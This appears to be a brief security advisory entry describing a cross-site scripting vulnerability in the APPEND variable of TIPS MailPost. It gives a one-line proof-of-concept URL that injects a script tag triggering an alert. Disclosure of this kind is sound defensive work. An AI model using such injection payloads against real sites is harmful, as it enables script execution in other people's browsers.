• info
• discussion
• exploit
• solution
• references

TIPS MailPost APPEND Variable Cross-Site Scripting Vulnerability

An exploit is not required to leverage this issue.

The following proof of concept is available:
http://www.example.com/scripts/mailpost.exe?*debug*=''&append=<script>alert('Can%20Cross%20Site%20Script')</script>